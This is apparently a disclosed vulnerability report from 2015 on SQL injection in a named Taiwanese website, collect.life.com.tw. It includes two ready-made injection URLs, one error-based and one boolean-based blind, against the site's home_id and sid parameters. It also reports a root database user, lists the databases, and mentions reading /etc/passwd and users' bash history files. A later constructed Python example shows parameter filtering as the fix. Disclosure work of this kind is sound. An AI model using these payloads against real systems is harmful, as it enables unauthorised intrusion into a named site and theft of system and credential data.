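2015-02-10: Details reported to the vendor, awaiting vendor handling
2015-02-14: Vendor confirmed; details disclosed to the vendor only
2015-02-24: Details disclosed to core white hats and experts in the relevant field
2015-03-06: Details disclosed to regular white hats
2015-03-16: Details disclosed to intern white hats
2015-03-27: Details disclosed to the public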
A site belonging to Taiwan's Life生活網 has a MySQL error-based injection as well as one boolean-based blind injection. The database user is root.
Injection point:
http://collect.life.com.tw/services/service.php?a=album&home_id=(select 1 and row(1,1)>(select count(*), concat(floor(rand(0)*2),0x5e5e5e,user(),0x5e5e5e) x from information_schema.character_sets group by x))&m=u&p=2&v=60906981.20744551&width=190
The home_id parameter is injectable (MySQL error-based injection).
Injection point 2:
http://collect.life.com.tw/note.php?act=get_adword&action=index&num=1&sid=1%27%20and%20length(user())=18--
The sid parameter is injectable (boolean-based blind).
The database user is root:
[email protected]
[*] ad
[*] collect
[*] information_schema
[*] mysql
[*] top_word
Reading /etc/passwd:
Reading /home/william/.bash_history
Reading /home/sbcache/.bash_history
Filter the parameters.
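What parameter filtering means for a parameter like sid (the same check applies to home_id), as an added example that is not code from the affected site or from the original report. It assumes the ids are short decimal strings, uses SQLite in place of the site's MySQL so it runs offline, and the table, data and function names are constructed for illustration.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in table; the real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE adword (sid TEXT PRIMARY KEY, word TEXT)")
    db.execute("INSERT INTO adword VALUES ('1', 'sample')")
    return db


def get_adword_concat(db, sid):
    """Flawed pattern: the request value is pasted into the SQL text,
    so a quote in sid ends the literal and the rest is parsed as SQL."""
    sql = "SELECT word FROM adword WHERE sid = '" + sid + "'"
    return db.execute(sql).fetchall()


# Assumption: a legitimate id is 1 to 10 decimal digits.
_NUMERIC_ID = re.compile(r"[0-9]{1,10}")


def get_adword_filtered(db, sid):
    """Filtered pattern: allow-list the format, then bind the value as data."""
    if not isinstance(sid, str) or not _NUMERIC_ID.fullmatch(sid):
        raise ValueError("sid must be a short decimal id")
    return db.execute("SELECT word FROM adword WHERE sid = ?", (sid,)).fetchall()


def rejected(db, sid):
    """True when the filtered lookup refuses the value outright."""
    try:
        get_adword_filtered(db, sid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # Constructed inputs shaped like the sid value in the report.
    for sid in ("1", "1' and length('abc')=3--", "1' and length('abc')=4--"):
        print(repr(sid), get_adword_concat(db, sid), rejected(db, sid))
```

With concatenation the two crafted values return different result sets, which is the true/false signal a boolean-based blind injection relies on; with the filter both are refused before any query is built.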
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-02-14 02:37
Thank you for the report.
None yet